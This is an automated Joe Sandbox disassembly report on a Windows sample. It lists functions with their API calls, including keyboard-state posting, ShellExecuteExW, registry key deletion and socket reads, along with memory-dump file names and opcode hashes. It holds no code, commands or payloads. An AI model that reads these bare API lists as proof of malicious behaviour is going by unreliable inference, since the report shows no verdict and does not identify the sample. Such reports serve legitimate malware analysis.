                                                                                                                        Function 00E9A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E9A1CE
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E9A205
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00E9A221
                                                                                                                        • _memmove.LIBCMT ref: 00E9A26F
                                                                                                                        • _memmove.LIBCMT ref: 00E9A28C
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00E9A29B
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E9A2B0
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E9A2CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 256516436-0
                                                                                                                        • Opcode ID: 2ed4a2af2c15fbd3dafeca9b7f3fef6d807ac0e14194d32e24fada25b8fb8ea6
                                                                                                                        • Instruction ID: a3ce89930d797ebc3655fe38e76336c201fb045c467ec21676eeb1c0d4a795cf
                                                                                                                        • Opcode Fuzzy Hash: 2ed4a2af2c15fbd3dafeca9b7f3fef6d807ac0e14194d32e24fada25b8fb8ea6
                                                                                                                        • Instruction Fuzzy Hash: BB318F31901105EFCF00DFA5EC85AAEB7B8FF45310B5480A5F904BB256D770DA15CBA1
                                                                                                                        Function 00EB8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EB8CF3
                                                                                                                        • GetDC.USER32(00000000), ref: 00EB8CFB
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB8D06
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00EB8D12
                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00EB8D4E
                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EB8D5F
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EBBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00EB8D99
                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EB8DB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864802216-0
                                                                                                                        • Opcode ID: c8d574996e0aae0bc8096124241232d3f1c7bd8f2c8cde6e830ddd8e3595658c
                                                                                                                        • Instruction ID: 5aec38caaca8f29cd1f262f6bf5b5f923738dee19a68249aaea33ee287c38434
                                                                                                                        • Opcode Fuzzy Hash: c8d574996e0aae0bc8096124241232d3f1c7bd8f2c8cde6e830ddd8e3595658c
                                                                                                                        • Instruction Fuzzy Hash: 3D318B72205214BFEB108F51DD8AFEB3BADEF49715F044066FE08EA291CA759841CBB0
                                                                                                                        Function 00EA1BFA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                        • _wcstok.LIBCMT ref: 00EA1D6E
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA1DFD
                                                                                                                        • _memset.LIBCMT ref: 00EA1E30
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                        • Opcode ID: 03d3f49a57dd2cc346445f081780ab0c4fd3697b0fcdb66fb08aca6f6c7d6c4c
                                                                                                                        • Instruction ID: 9e32a23812914743833bdf94ad825877de1fb1a00ba6a6c10c67364ec458a5f7
                                                                                                                        • Opcode Fuzzy Hash: 03d3f49a57dd2cc346445f081780ab0c4fd3697b0fcdb66fb08aca6f6c7d6c4c
                                                                                                                        • Instruction Fuzzy Hash: F7C194756083409FC714EF24C891A5AB7E4FF89315F00596DF999BB2A2DB30ED48CB92
                                                                                                                        Function 00E6B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec2df0ddb68687ac0165d37524197dfe8efaaac39c6734e277c632e4a77b0586
                                                                                                                        • Instruction ID: 3bbee308a8b3991d3f459206b191945fc7364ad4fe4a22ddc88ad62d629a754f
                                                                                                                        • Opcode Fuzzy Hash: ec2df0ddb68687ac0165d37524197dfe8efaaac39c6734e277c632e4a77b0586
                                                                                                                        • Instruction Fuzzy Hash: 4D718A70904109EFCB14DF98DC88EEEBB7AFF85354F148159F925BA252D7309A82CB60
                                                                                                                        Function 00EB2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB214B
                                                                                                                        • _memset.LIBCMT ref: 00EB2214
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00EB2259
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EB2320
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00EB232F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4082843840-2766056989
                                                                                                                        • Opcode ID: de1b35171326a2baac64312fa6a14b7665adf3737b382d50da4b797f320ee55c
                                                                                                                        • Instruction ID: 2cbd52f738414d91529aa5bd64038d451c38eed23768bfe9b4a8d46cb6ef0e44
                                                                                                                        • Opcode Fuzzy Hash: de1b35171326a2baac64312fa6a14b7665adf3737b382d50da4b797f320ee55c
                                                                                                                        • Instruction Fuzzy Hash: E7716871A0061A9FCB04EFA8C9819AEBBF5FF48310F109459E956BB361DB30AD44CB90
                                                                                                                        Function 00E947DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00E9481D
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E94832
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00E94893
                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E948C1
                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E948E0
                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E94926
                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E94949
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: cb05df8d4f4a8cd6b5028d5667ed85786a7664e77264c041eb6bbad27386dcaa
                                                                                                                        • Instruction ID: 6872786a7d5d9e149ba2e749a50d9fdb896f0cb945500bd643ed09ee79463864
                                                                                                                        • Opcode Fuzzy Hash: cb05df8d4f4a8cd6b5028d5667ed85786a7664e77264c041eb6bbad27386dcaa
                                                                                                                        • Instruction Fuzzy Hash: C251E2E06087D63DFF3A42248C05FBBBFA95B46308F089589F1D9668C2C2D4EC8AD750
                                                                                                                        Function 00E945F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(00000000), ref: 00E94638
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E9464D
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00E946AE
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E946DA
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E946F7
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E9473B
                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E9475C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 0f1a4313378a3614d62f7884cc85dea319727adbdfc343f06c409ec18c73e238
                                                                                                                        • Instruction ID: a6ccdaad05710c46957e6f25fc6918a5a6b4dd62898b74ef4e909b9c8cfbaed1
                                                                                                                        • Opcode Fuzzy Hash: 0f1a4313378a3614d62f7884cc85dea319727adbdfc343f06c409ec18c73e238
                                                                                                                        • Instruction Fuzzy Hash: A951F1E05047D93DFF3687648C05FBABEA99B06308F08548AE1D4668C3D3A4EC9AD750
                                                                                                                        Function 00E986AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2945705084-0
                                                                                                                        • Opcode ID: ec467e71328dfae165e1cb5d9c8e2b5bcc1f0d0e5458b5d181f26e4b06141256
                                                                                                                        • Instruction ID: 6d337f105fa8cb7b573594fe49aee2cefee318eabeabf2a36aa3fd4bb192e3a4
                                                                                                                        • Opcode Fuzzy Hash: ec467e71328dfae165e1cb5d9c8e2b5bcc1f0d0e5458b5d181f26e4b06141256
                                                                                                                        • Instruction Fuzzy Hash: EC417E65C1025475CF15ABF8C8869CEB7ACEF05310F60E866E618F3232EA30E65587A5
                                                                                                                        Function 00EA936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00EEDBF0), ref: 00EA9409
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9416
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00EA943A
                                                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00EA9452
                                                                                                                        • _strlen.LIBCMT ref: 00EA9484
                                                                                                                        • _memmove.LIBCMT ref: 00EA94CA
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA94F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2795762555-0
                                                                                                                        • Opcode ID: 02a714bc7930545f1b2183bac6ed3fdd0d77168d8f11997cfd0b3d187d74edfa
                                                                                                                        • Instruction ID: e43d3ce54b5c68c1262ca6711c9c0ad1f192e362e78de1a026c4b1ea7930d195
                                                                                                                        • Opcode Fuzzy Hash: 02a714bc7930545f1b2183bac6ed3fdd0d77168d8f11997cfd0b3d187d74edfa
                                                                                                                        • Instruction Fuzzy Hash: F441A471504204AFCB04EB64DC95AEEB7B9EF4D314F10555AF516BB2D2DB30AE05CB60
                                                                                                                        Function 00EB9D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB9DB0
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB9E57
                                                                                                                        • IsMenu.USER32(?), ref: 00EB9E6F
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB9EB7
                                                                                                                        • DrawMenuBar.USER32 ref: 00EB9ED0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 3866635326-4108050209
                                                                                                                        • Opcode ID: 121a203bdad689c8493fbd29634a6abbf0af8f32552d5dd5443a03cda7fea6eb
                                                                                                                        • Instruction ID: f84c032bebbab33f0f52cc01c0ace3adbc8e968188782a265fbcaddb9dc29784
                                                                                                                        • Opcode Fuzzy Hash: 121a203bdad689c8493fbd29634a6abbf0af8f32552d5dd5443a03cda7fea6eb
                                                                                                                        • Instruction Fuzzy Hash: 18411775A00209EFDB20DF54E884ADABBF4FF05358F05A069EA15B7262D730ED54DB60
                                                                                                                        Function 00EB3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00EB3C92
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EB3CBC
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00EB3D71
                                                                                                                          • Part of subcall function 00EB3C63: RegCloseKey.ADVAPI32(?), ref: 00EB3CD9
                                                                                                                          • Part of subcall function 00EB3C63: FreeLibrary.KERNEL32(?), ref: 00EB3D2B
                                                                                                                          • Part of subcall function 00EB3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EB3D4E
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EB3D16
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 395352322-0
                                                                                                                        • Opcode ID: 821662f082c2a571fc6b628a09fc097a4bbc3eb3e0c83cec080c637878da67f8
                                                                                                                        • Instruction ID: 3f6d024042bd57d60c48a0c5e556536e27b80287cac10c4efe6ee87d89408d3b
                                                                                                                        • Opcode Fuzzy Hash: 821662f082c2a571fc6b628a09fc097a4bbc3eb3e0c83cec080c637878da67f8
                                                                                                                        • Instruction Fuzzy Hash: E0310971901209BFDB149BE5DC8AAFFBBBDEF08304F10516AA512F2151DA709F499B60
                                                                                                                        Function 00EB8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EB8DF4
                                                                                                                        • GetWindowLongW.USER32(0114A8F0,000000F0), ref: 00EB8E27
                                                                                                                        • GetWindowLongW.USER32(0114A8F0,000000F0), ref: 00EB8E5C
                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EB8E8E
                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EB8EB8
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EB8EC9
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB8EE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2178440468-0
                                                                                                                        • Opcode ID: da2879102a23486d2260809269adfadbae2f4d7ce7ef24b6e3b1add21d6ac158
                                                                                                                        • Instruction ID: 73e91feec9320e4bf15506559f2b84ae298e387f5ec8b1f540917424ce9762bc
                                                                                                                        • Opcode Fuzzy Hash: da2879102a23486d2260809269adfadbae2f4d7ce7ef24b6e3b1add21d6ac158
                                                                                                                        • Instruction Fuzzy Hash: 40315731204215DFDB21CF59EE84F9637E9FB4A328F1591A9F615AB2B2CB71E840DB40
                                                                                                                        Function 00E916F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E91734
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9175A
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E9175D
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00E9177B
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00E91784
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E917A9
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00E917B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 57dadb218b51668def2f2d0089cdb9b56c096b8107afd9e769c9fcae665d77b2
                                                                                                                        • Instruction ID: 188e4b3a397b7beed8c34386c607419bdd647174c835b01af2171875bd38a997
                                                                                                                        • Opcode Fuzzy Hash: 57dadb218b51668def2f2d0089cdb9b56c096b8107afd9e769c9fcae665d77b2
                                                                                                                        • Instruction Fuzzy Hash: CB21B27560520AAFDF009BA9DC88CFF77ECEB0A3647408526F915EB250D770EC458760
                                                                                                                        Function 00E969F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
